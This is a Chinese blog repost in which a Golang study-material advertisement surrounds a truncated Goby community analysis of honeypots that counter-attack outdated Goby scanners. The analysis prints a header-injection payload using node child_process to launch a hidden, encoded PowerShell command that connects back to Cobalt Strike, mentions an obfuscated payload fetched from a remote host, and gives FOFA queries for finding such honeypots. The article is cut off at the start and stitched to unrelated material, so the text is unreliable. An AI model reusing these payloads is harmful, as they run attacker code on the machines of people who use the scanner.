技术分享 针对蜜罐反制Goby背后的故事,【Golang面试题】

于 2024-04-20 03:10:16 发布
阅读量721 收藏 13
点赞数 7
分类专栏: 2024年程序员学习 文章标签: golang 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77033672/article/details/137984387
版权
本文分享了一位技术专家的经验,提供了一份针对Golang的全套学习资料,包括基础知识、进阶课程和安全防护内容。作者强调了自学编程的效率问题,并提到了蜜罐攻击的案例,提醒读者及时更新软件以防止安全风险。
摘要由CSDN通过智能技术生成

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新Golang全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip1024b (备注go)
img

正文

index.php

<?php header("X-Powered-By: PHP/

// /js/1.js
(function(){require(‘child_process’).exec(‘powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAc…(省略)’);})();

当用户点击进入IP详情页面后,不会有任何感知,但实际上已经悄然执行powershell代码
在这里插入图片描述

成功上线CS

在这里插入图片描述

所以,尽快升级Goby到最新版本吧~~,除了自身漏洞的修复,我们也一直在推出更多好用、实用的新功能期待师傅们的体验和反馈。

0x04 还有多少个蜜罐在望眼欲穿呢?

诚如我们前文所说,这是一个已经修复近两年前的漏洞了,但是在全球范围内,仍然有着大量的蜜罐设备,再等待着某一个仍然使用旧版本Goby的好心人,我们可以使用一条FOFA语法便可以很快的找到这些目标:

header=“img” && header=“onerror”

可以看到,在全球范围内,有近1899条蜜罐记录,其Payload也大同小异,与前文碰到的蜜罐设备一致,有意思的是在境外也有数十条记录(老外也想反制Goby?)。

而从产品分布的角度来说,这类蜜罐广泛覆盖在:深信服VPN、致远OA、RANZHIOA、泛微OA、phpMyAdmin等在攻防场景中广泛涉及的产品和应用,师傅们碰到这些资产可要多个心眼。
在这里插入图片描述

在这里插入图片描述

我们也可以对Fofa语法进行略微的调整,看看有没有一些新东西

header=“img” && header=“onerror” && header!=“PHP”

剔除掉同类蜜罐后,仅剩下160条记录,明显有着与之前蜜罐设备不同的利用方式
在这里插入图片描述

X-Powered-By: <img src=# οnerrοr=window.open(‘https://202.**.***.12/help.html’)>

跟进到help.html之后,发现是一个经过混淆的Payload

虽然绝大部分代码已经经过混淆,但不难看出Payload的用意是将恶意文件写入磁盘并调用执行,但从最初的语法来说,这应该并不止针对于Goby的蜜罐设备,在Goby中没能,推测可能是某一种扫描器,该扫描器使用了某种框架 ,既集成了浏览器的解析环境,又可以直接在该浏览器的解析环境中调用node.js的代码,从而触发反制者的Payload。

0x05 尾声

到这里关于蜜罐的分析就结束了,也提前预告一下我们最近在为Goby实战场景的最佳实践做了大量的测试,目前也小有收获,近期会发布相关版本和文章,希望师傅们保持关注不要错过~

0x06 参考

Goby 欢迎表哥/表姐们加入我们的社区大家庭,一起交流技术、生活趣事、奇闻八卦,结交无数白帽好友。

也欢迎投稿到 Goby(Goby 介绍/扫描/口令爆破/漏洞利用/插件开发/ PoC 编写/ IP 库使用场景/ Webshell /漏洞分析 等文章均可),审核通过后可奖励 Goby 红队版,快来加入微信群体验吧~~~

文章来自Goby社区成员:Kv2@白帽汇安全研究院,转载请注明出处。
微信群:公众号发暗号“加群”,参与积分商城、抽奖等众多有趣的活动
获取版本:https://gobysec.net/sale

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注Go)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
o)**
[外链图片转存中…(img-fz5QMayV-1713553805613)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

解佳思提
关注
  • 7
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
溯源系列:溯源(八)之利用goby RCE 进行反制黑客
01-06
溯源系列:溯源(八)之利用goby RCE 进行反制黑客
红蓝对抗-反制
Shanfenglan's blog
01-19 6万+
CATALOG1.前言2. 1.前言 初次接触反制技术,写一个文档作为记录。 2.
技术分享 | 针对蜜罐反制Goby背后故事
m0_46699477的博客
10-24 232
近期我们联动FORadar做了一个插件,实现了从企业名称->企业漏洞的全自动检测流程,在做具体实践的时候碰到了两个很有意思的蜜罐,其中一个蜜罐内置了Weblogic漏洞,同时配置有专门针对旧版本Goby反制Payload,而另一个蜜罐则具备较强的隐蔽性,若非团队有专门研究蜜罐的人员,差点栽在这给蜜罐上,当然,这篇文章主要想聊聊第一个蜜罐,第二个有机会再单独拿出来探讨。
浅谈蜜罐3
TT成长博客
02-10 580
小年夜。一个开心的日子,TT一天没出门,没洗脸,躺在床上撩呲老大爷。。。 还是会担心TT会被过往的事情拨动心弦,但是只要老舅在,就会尽力扼杀那些不好的苗头。坚决的。 TT做了两个小视频,感觉很美好,瞬间就充满了正能量和希望。 昨晚小酌,结果晕乎了半天,贵在坚持,所以还是要写点东西,哪怕很短。 昨天提到的蜜罐的溯源和攻击反制,前面也有说到在红蓝对抗中利用蜜罐可以查到攻击者很多身份信息,比如微博账号啥的,奇怪是怎么做到的,今天巧啦,也不算巧,就是学习到了,可能是用如下的思路去做到的。 方法:通过部署蜜
溯源(八)之利用goby RCE 进行反制黑客
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-03 774
当然在这里我们要点击这个之后代码才会被触发,实际过程中我们需要诱导攻击者去点击这些可以交互的地方,我这里可以给大家提供一个思路,我们可以在环境中部署一个蜜罐,那蜜罐是不是会模拟很多可以攻击的服务诱导攻击者攻击,在goby扫描过程中,攻击者看到那么多的服务会不会去疯狂点击和查看扫到了些什么?当goby再扫描网站时,会去扫描网站下的目录,再根据网站目录下的文件去得到一些网站的信息,我们扫到的php服务就是根据被扫的文件得到的。所展示给我们的网站扫出来的信息都是程序写死的,这样我们很难去利用xss漏洞去反制
go0r:golang中一个简单的ssh蜜罐
06-14
Golang 中的简单 ssh 蜜罐 一个简单的,大约 100 行代码,用 golang 编写的 ssh 蜜罐。 名字 它基于波斯谚语“گریه کردن بر روی گور بدون مرده”(在空坟墓前哭泣)和goor(گور在波斯语...
142-溯源反制之MySQL蜜罐研究.pdf
09-20
142-溯源反制之MySQL蜜罐研究.pdf
2021HW溯源反制终极手册.zip
04-27
入侵杀伤链与入侵反杀伤链; 智能驱动的计算机网络...APT攻击检测与反制技术体系; 溯源反制中常见技术; 红蓝对抗中的溯源反制实战案例讲解; 溯源反制产品; 蜜罐诱捕市场指南; 企业安全建设之蜜罐技术的应用等等。
基于蜜罐技术的FPGA实现
01-19
 蜜罐技术由来已久,蜜罐(Honeypot)是一种在互联网上运行的计算机系统。它是专门为吸引并诱骗那些试图非法闯入他人计算机系统的人(如电脑黑客)而设计的,蜜罐系统是一个包含漏洞的诱骗系统,它通过模拟一个或多...
蜜罐技术在社交网络反垃圾信息中应用
07-04
现在越来越多的人通过社交网络来分享了解信息,社交网络给人们带来的方便相信大家都很了解,但是随着社交网络的发展它的安全问题越来越收到重视,随之技术的发展攻击者知识日趋成熟,攻击工具和方法也日趋复杂。...
Goby反制复现
qq_50854662的博客
11-03 526
Goby反制复现
网络安全领域之-蜜罐技术
最新发布
柳岸花又明的博客
11-15 2025
其次是高交互蜜罐,高交互蜜罐是相对于低交互蜜罐而言的,是在开放相关端口的基础之上增加了一些仿真的服务或者应用在里面,达到一个更好迷惑攻击者视线的一个效果,一般此类蜜罐,像web类蜜罐会在护网或者重保期间通过防火墙,或者路由器映射在用户互联网出口处,“故意”让攻击者去攻击“蜜罐”这样的话,蜜罐就可以在攻击者打到真实业务之前就锁定攻击者的ip,以至提前做出相关的策略、响应。所以说,蜜罐的部署方式基本是依照与该厂商蜜罐的特性而言的,蜜罐的部署需要考虑多个因素,如蜜罐的类型、部署位置、操作系统、应用程序等。
【应急响应】战中溯源反制&对抗上线CS&Goby&蚁剑&Sqlmap等安全工具
今天是几号的博客
04-20 1657
CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼 蜜罐反制。前面准备工作都是一气呵成,这里有个一很坑的地方就是使用pip安装Frida module时,一开始安装总是报错(tiemout以及各种问题),然后我不停的换Pytthon版本emmm,最后解决是使用超级管理员权限运行cmd就好了(心中无数个?) ```bash python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv
蜜罐如何获取攻击者敏感信息
热门推荐
weixin_43526443的博客
02-07 7万+
目录 Part1 前言 Part2 原理 Part3 mysql数据包分析 Part4 蜜罐搭建 Part5 资料参考 Part1 前言 在护网中看到甲方的蜜罐感觉很好玩,就想着自己也搭建一个。然后就看到很多文章讲述用蜜罐获取手机号了什么的,感觉很神奇,就研究了研究。 蜜罐获取手机号信息其实就是一个mysql的任意文件读取漏洞,关于这个漏洞已经出现很久了,晚上也有很多关于这个漏洞的文章。但是对于一些入行晚的师傅,可能还不是太了解。本篇文章就来讲述一下mysql蜜罐的原理。 Part2 原..
【网络安全】蜜罐部署实战&DecoyMini攻击诱捕
weixin_46414659的博客
07-25 209
文章到底在讲什么?省流:实战演示,教你如何伪造一个钓鱼网站,获取对方信息它的全称是智能仿真与攻击诱捕工具。
应急响应—溯源反制
剁椒鱼头没剁椒的博客
11-07 1344
可能整体来说很简单,目前根据IP地址能够进行溯源的也就这些了,基本上都是看裤子来解决,不靠裤子,除非去加上微信去忽悠,否则获取手机号确实没那么容易。当然如果你条件允许,你直接通过获取到的IP直接攻击他,直接拿下他服务器那什么获取不到…
Goby 2.0 | 引擎大升级 · DIY 指纹时代
m0_46699477的博客
07-06 1346
不断探索的蓝
Goby在护网中的应用
SHELLCODE_8BIT的博客
07-10 717
1.Goby介绍2.使用目的2.2 效率2.3 资产的覆盖率3.解决问题
HW溯源反制
xmj818719的博客
08-25 836
HW溯源反制-好文转载
HW与网络安全岗位面试题大全(附答案)
"该文档是一份综合性的面试题合集,包含了100多套HW(可能是指华为的面试题)和网络安全岗位的面试题目,覆盖了多家知名厂商如天融信、漏洞盒子、长亭、安恒等,并且适用于安全攻防研究员、安全服务工程师、渗透测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值